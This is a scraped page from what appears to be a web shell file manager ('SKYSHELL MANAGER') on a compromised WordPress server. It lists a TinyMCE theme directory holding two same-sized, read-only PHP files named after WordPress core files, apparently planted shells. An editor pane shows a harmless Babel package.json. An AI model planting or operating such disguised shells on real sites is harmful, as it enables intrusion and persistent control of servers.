📁
SKYSHELL MANAGER
PHP v8.3.6
Create
Create
Path:
root
/
var
/
www
/
cstage
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
ms-files.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
Edit: package.json
{ "name": "@babel/eslint-plugin-development-internal", "version": "7.19.1", "description": "The Babel Team's ESLint custom rules plugin. Since it's internal, it might not respect semver.", "main": "./lib/index.cjs", "keywords": [ "babel", "eslint", "eslintplugin", "eslint-plugin", "babel-eslint" ], "private": true, "bugs": { "url": "https://github.com/babel/babel/issues" }, "homepage": "https://github.com/babel/babel/tree/master/eslint/babel-eslint-plugin-development-internal", "peerDependencies": { "@babel/eslint-parser": ">=7.11.0", "eslint": ">=7.5.0" }, "devDependencies": { "eslint": "^8.22.0" }, "type": "commonjs" }
Save